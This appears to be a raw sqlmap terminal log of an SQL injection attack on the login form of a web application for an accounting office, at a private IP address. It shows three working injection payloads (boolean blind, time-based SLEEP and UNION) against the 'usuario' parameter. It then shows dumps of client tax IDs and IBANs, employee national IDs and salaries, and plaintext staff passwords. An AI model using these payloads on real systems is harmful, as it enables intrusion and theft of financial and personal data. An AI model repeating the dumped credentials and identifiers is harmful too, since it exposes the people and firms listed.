        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.6#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:45:22 /2026-06-01/

[1/1] URL:
GET http://172.20.17.230/login.php
POST data: usuario=admin&password=x
do you want to test this URL? [Y/n/q]
> Y
[17:45:23] [INFO] testing URL 'http://172.20.17.230/login.php'
[17:45:23] [INFO] resuming back-end DBMS 'mysql' 
[17:45:23] [INFO] using '/home/jamsec/.local/share/sqlmap/output/results-06012026_0545pm.csv' as the CSV results file in multiple targets mode
[17:45:23] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=19bd344e1c2...cffcdee836'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: usuario (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: usuario=admin%' AND 2187=(SELECT (CASE WHEN (2187=2187) THEN 2187 ELSE (SELECT 4155 UNION SELECT 9662) END))-- SDtR&password=x

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: usuario=admin%' AND (SELECT 1067 FROM (SELECT(SLEEP(5)))ljGC) AND 'jJXb%'='jJXb&password=x

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: usuario=admin%' UNION ALL SELECT NULL,CONCAT(0x7176766b71,0x4a4841634f636e66646f6d5061796146654f4c687661515647585a7a4957494850526c48656c4d56,0x71706b6a71),NULL,NULL-- -&password=x
---
do you want to exploit this SQL injection? [Y/n] Y
[17:45:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.67, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:45:23] [INFO] fetching columns for table 'clientes' in database 'apexgestoria'
got a 302 redirect to 'http://172.20.17.230/panel.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[17:45:23] [INFO] fetching entries for table 'clientes' in database 'apexgestoria'
Database: apexgestoria
Table: clientes
[3 entries]
+----+-----------+--------------------------+-----------------------+-------------------------+
| id | nif       | iban                     | email                 | nombre                  |
+----+-----------+--------------------------+-----------------------+-------------------------+
| 1  | B12345678 | ES7620770024003102575766 | info@vidalsl.cat      | Construcciones Vidal SL |
| 2  | X1234567L | ES9121000418450200051332 | anna@perruqueria.cat  | Perruqueria Anna        |
| 3  | J87654321 | ES7100302053091234567895 | admin@tallerspuig.cat | Tallers Puig SCP        |
+----+-----------+--------------------------+-----------------------+-------------------------+

[17:45:23] [INFO] table 'apexgestoria.clientes' dumped to CSV file '/home/jamsec/.local/share/sqlmap/output/172.20.17.230/dump/apexgestoria/clientes.csv'
[17:45:23] [INFO] fetching columns for table 'nominas' in database 'apexgestoria'
[17:45:23] [INFO] fetching entries for table 'nominas' in database 'apexgestoria'
Database: apexgestoria
Table: nominas
[2 entries]
+----+-----------+--------------------------+-------------------+---------------+
| id | dni       | iban                     | empleado          | salario_bruto |
+----+-----------+--------------------------+-------------------+---------------+
| 1  | 39123456A | ES1000492352082414205416 | Joan Morales Pi   | 2450.00       |
| 2  | 39654321B | ES8021000813610123456789 | Marta Soler Vidal | 2780.50       |
+----+-----------+--------------------------+-------------------+---------------+

[17:45:23] [INFO] table 'apexgestoria.nominas' dumped to CSV file '/home/jamsec/.local/share/sqlmap/output/172.20.17.230/dump/apexgestoria/nominas.csv'
[17:45:23] [INFO] fetching columns for table 'usuarios' in database 'apexgestoria'
[17:45:23] [INFO] fetching entries for table 'usuarios' in database 'apexgestoria'
Database: apexgestoria
Table: usuarios
[3 entries]
+----+----------+----------+--------------+
| id | rol      | usuario  | password     |
+----+----------+----------+--------------+
| 1  | admin    | admin    | Apex.2026!   |
| 2  | contable | jmorales | gestoria2024 |
| 3  | soporte  | soporte  | soporte123   |
+----+----------+----------+--------------+

[17:45:23] [INFO] table 'apexgestoria.usuarios' dumped to CSV file '/home/jamsec/.local/share/sqlmap/output/172.20.17.230/dump/apexgestoria/usuarios.csv'
[17:45:23] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/jamsec/.local/share/sqlmap/output/results-06012026_0545pm.csv'
[17:45:23] [WARNING] your sqlmap version is outdated

[*] ending @ 17:45:23 /2026-06-01/

